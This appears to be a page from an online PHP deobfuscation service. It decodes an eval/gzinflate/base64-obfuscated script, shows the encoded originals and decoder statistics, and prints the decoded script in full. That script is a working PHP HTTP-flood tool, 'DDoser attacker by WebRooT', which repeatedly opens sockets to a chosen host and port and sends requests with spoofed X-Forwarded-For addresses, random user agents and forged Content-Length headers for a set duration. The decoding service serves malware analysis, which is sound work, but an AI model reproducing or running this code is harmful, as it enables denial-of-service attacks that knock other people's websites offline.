Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode('SyvNSy7JzM9TSEnMKslOMTe0sDTUUCkuKdJUqObl4gQClUQFWwWlmAozIyA2..
Decoded Output download
?><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="author" content="WebRooT" />
<title>DDoser attacker by WebRooT</title>
<style>
body { padding: 3px; }
* {
background-color: #1F1F1F;
color: #0EEF57;
font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
font-size: 18px;
margin: 0; }
input {
width: 440px;
border: solid 1px #00BCFF;
padding: 2px; }
input.accion {
width: 215px;
border: solid 2px #00BCFF;
padding: 3px;
cursor: pointer }
input:hover , input:active { border-color: #FFE900 }
#dinamico {
padding: 3px;
font-size: 13px!important;
height: 300px;
min-height: 300px;
max-height: 300px;
overflow: hidden }
</style>
</head>
<br>
<center>
<body>
<form action="" method="get" name="jaja">
<table>
<tr>
<td class="titulo">
Hedef/Ip</td> <td><input id="boton" type="text" name="host" value="site.com" size="40px" ></td>
</tr>
<tr>
<td class="titulo">
Dosya Yolu </td> <td> <input id="boton" type="text" name="path" value="/" size="40px" />
</td>
</tr>
<tr>
<td class="titulo">Rastgele Dosya Yolu ret</td><td><input type="checkbox" name="rastgele" /></td>
</tr>
<tr>
<td class="titulo">Yol Belirle</td><td> <input type="text" name="rastgele_yol" value="/?s=*" /></td>
</tr>
<tr>
<td class="titulo">
Port </td>
<td>
<select name="port" id="boton">
<option value="80">80 (HTTP)</option>
<option value="443">443 (HTTPS)</option>
<option value="3128">3128 (proxy)</option>
<option value="8080">8080 (proxy)</option>
<option value="1080">1080 (internal proxies)</option>
<option value="2301">2301 (reverse WWW)</option>
</select></td>
</tr>
<tr>
<td class="titulo">Sre (Saniye)</td><td> <input type="text" name="sure" value="30" /></td>
</tr>
<tr>
<td class="titulo">
Hazr msn? </td> <td>
<input type="submit" value="Saldir!" class="accion"> <input type="button" value="Durdur." class="accion" onclick="window.stop()" /> </td>
</tr>
</table>
</form>
<br />
<div id="dinamico">
<?php
@set_time_limit(0);
ob_start();
if($_GET)
{
$host = $_GET['host'] or die("Hedefi belirle");
$port = $_GET['port'] or die("Portu belirle");
$sure = $_GET['sure'] or die("Sreyi belirle");
$rastgele = $_GET['rastgele'];
$time = time();
$toplam_sure = $time+$sure;
if(isset($rastgele)){
$rastgele_yol = $_GET['rastgele_yol'] or die("Rastgele yolu belirle");
while(1)
{
if(time() > $toplam_sure)
{
echo "Saldr tamamland";
break;
}
$ddos = ddoser($host,rasgele(25,$rastgele_yol),$port);
}
}
else
{
$path = $_GET['path'] or die("Yolu belirle");
while(1)
{
if(time() > $toplam_sure)
{
echo "Saldr tamamland";
break;
}
$ddos = ddoser($host,$path,$port);
}
}
}
function rasgele($uzunluk,$uzanti=NULL)
{
$sifre = ""; //ba?lang?? de?eri bo? olarak ayarlan?yor.
for($i=0;$i<$uzunluk;$i++)
{
switch(rand(1,3))
{
case 1: $sifre.=chr(rand(48,57)); break; //0-9
case 2: $sifre.=chr(rand(65,90)); break; //A-Z
case 3: $sifre.=chr(rand(97,122)); break; //a-z
}
}
$sifre = preg_replace('@\*@si',$sifre,$uzanti);
//$sifre = $sifre.$uzanti;
return $sifre;
}
function ddoser($dominio, $ruta, $port) {
//hago un random de ips para no ser siempre el mismo vistitante
$ip_simulada = rand(188, 254) . '.' . rand(1, 254) . '.' . rand(1, 254) . '.' . rand(1, 254);
//defino y abro socket segun los datos del form
$socket = fsockopen($dominio, $port, $errno, $errstr, 5);
// comienzan los datos del header para parecer una persona comun xD
$header.= "GET " . $ruta . " HTTP/1.1
";
$header.= "Host: " . $dominio."
";
$header.= "User-Agent: ".rasgele(50,"Mozilla/5.0 (*)")."
";
$header.= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5
";
$header.= "Accept-Language: tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
";
$header.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
";
$header.= "Proxy-Connection: keep-alive
";
$header.= "Referer: http://" . $dominio . $ruta . "
";
$header.= "Content-Type: application/x-www-form-urlencoded
";
$header.= "Content-Length: " . mt_rand(100000000, 1000000000);
$header.= "X-Forwarded-For: " . $ip_simulada . "
";
$header.= "Cache-Control: no-cache, no-store, max-age=0, must-revalidate
";
$header.= "Pragma: no-cache
";
$header.= "Expires: Sun, 01 Jul 1995 00:00:00 GMT
";
$header.= "Via: CB-Prx
";
$header.= "Connection: keep-alive
";
//envio todo lo recolectado
$send_header = fwrite($socket, $header);
fclose($socket);
echo "Saldiri: <span style='color:#FF0F2F'>" . $ip_simulada . "</span> @ " . htmlentities(str_replace('www.', '', $dominio)) . "" . htmlentities($ruta) . "<br />";
ob_flush();
flush();
}
?>
</div>
</center>
</body>
</html>
Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode('SyvNSy7JzM9TSEnMKslOMTe0sDTUUCkuKdJUqObl4gQClUQFWwWlmAozIyA2jKkwNwbSpjEVxmZAbBJTYZoG5JtAxMxAcnC+kjXUhCSoCeZA3YlA2hKIU4EYaIJZMtRUFB1FqSWlRXkKKkkaKokQ12hCZGoB')));
eval(gzinflate(base64_decode('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')));
Function Calls
gzinflate | 3 |
dajtkd71891 | 1 |
base64_decode | 3 |
Stats
MD5 | c9ab347488ae289963a897e5d6742115 |
Eval Count | 3 |
Decode Time | 98 ms |